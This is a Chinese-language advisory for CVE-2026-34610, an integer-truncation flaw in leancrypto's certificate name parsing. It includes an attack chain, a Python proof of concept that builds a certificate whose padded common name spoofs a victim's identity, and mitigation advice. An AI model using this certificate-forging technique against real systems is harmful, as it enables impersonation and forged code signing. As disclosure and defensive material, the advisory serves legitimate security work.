CVE-2026-34610: leancrypto证书解析整数截断漏洞

漏洞信息

漏洞编号

CVE-2026-34610

漏洞类型

整数截断

CVSS评分

5.9 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

leancrypto

漏洞概述

leancrypto是一个专注于后量子密码学算法的加密库。在1.7.1版本之前，其证书解析函数`lc_x509_extract_name_segment()`存在整数截断漏洞。攻击者可利用该漏洞构造特制的恶意证书，通过填充256字节数据绕过长度校验，使得恶意证书的通用名称（CN）与受害者证书完全一致。这导致在PKCS#7验证、证书链匹配和代码签名过程中发生身份伪造，严重威胁系统身份认证机制。

技术细节

该漏洞源于`lc_x509_extract_name_segment()`函数在处理证书通用名称（CN）时的类型转换错误。代码将`size_t`类型的长度变量`vlen`直接转换为`uint8_t`类型进行存储。由于`uint8_t`最大只能表示255，当攻击者构造的证书CN长度为`N + 256`（N为受害者CN长度）时，计算过程`(uint8_t)(256 + N)`会发生截断回绕，结果等于`N`。在解析过程中，程序仅读取前N个字节作为CN，而攻击者精心构造的前N个字节与受害者的身份完全相同。因此，尽管实际证书数据不同，但在验证逻辑中，攻击者的证书被判定为与目标证书具有相同的CN。利用此漏洞，攻击者可以绕过PKCS#7签名验证、伪造证书链匹配，进而进行代码签名伪造或身份冒充攻击。

攻击链分析

STEP 1

侦察与信息收集

攻击者确定目标受害者，并获取其证书中的通用名称（CN）及其长度N。

STEP 2

构造恶意证书

攻击者生成一个新的密钥对，并创建一个X.509证书。将证书的CN字段设置为受害者的CN字符串后接256字节的填充数据，使得总长度为N+256。

STEP 3

触发漏洞解析

将恶意证书发送给使用leancrypto库（< 1.7.1）的系统进行解析。库中的`lc_x509_extract_name_segment`函数将长度截断为N，并读取前N个字节作为CN。

STEP 4

身份伪造

由于截断后的CN与受害者完全一致，系统错误地认为该恶意证书属于受害者，从而通过PKCS#7验证或代码签名检查。

STEP 5

达成攻击目的

攻击者利用伪造的身份签署恶意代码或解密/篡改受PKCS#7保护的通信数据。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.hazmat.backends import default_backend
import datetime

# Generate a private key for the attacker
private_key = rsa.generate_private_key(
    public_exponent=65537,
    key_size=2048,
    backend=default_backend()
)

# Target CN (e.g., "victim.com")
target_cn = "victim.com"
n = len(target_cn)

# Calculate padding to trigger the integer truncation
# The vulnerable code does: cn_size = (uint8_t)(vlen)
# We need vlen = N + 256, so (uint8_t)(N + 256) = N
padding_length = 256
malicious_cn = target_cn + ("A" * padding_length)

print(f"[+] Target CN Length: {n}")
print(f"[+] Malicious CN Length: {len(malicious_cn)}")
print(f"[+] Malicious CN Content: {malicious_cn[:30]}...{malicious_cn[-30:]}")

# Create a self-signed certificate with the malicious CN
subject = issuer = x509.Name([
    x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
    x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"CA"),
    x509.NameAttribute(NameOID.LOCALITY_NAME, u"San Francisco"),
    x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"My Company"),
    # Inject the crafted CN to exploit the truncation bug
    x509.NameAttribute(NameOID.COMMON_NAME, malicious_cn),
])

cert = x509.CertificateBuilder().subject_name(
    subject
).issuer_name(
    issuer
).public_key(
    private_key.public_key()
).serial_number(
    x509.random_serial_number()
).not_valid_before(
    datetime.datetime.utcnow()
).not_valid_after(
    datetime.datetime.utcnow() + datetime.timedelta(days=365)
).sign(private_key, hashes.SHA256(), default_backend())

# Save the malicious certificate
with open("malicious_cert.der", "wb") as f:
    f.write(cert.public_bytes(serialization.Encoding.DER))

print("[!] Generated malicious_cert.der. When parsed by leancrypto < 1.7.1, the CN will be truncated to 'victim.com'.")

影响范围

leancrypto < 1.7.1

防御指南

临时缓解措施

如果无法立即升级leancrypto库，建议在应用层对解析出的证书字段实施额外的长度校验逻辑。具体而言，在调用相关证书解析函数后，应检查原始DER编码中的CN长度与解析后的长度是否一致，拒绝处理长度异常（大于255字节）的证书，从而阻断整数截断带来的风险。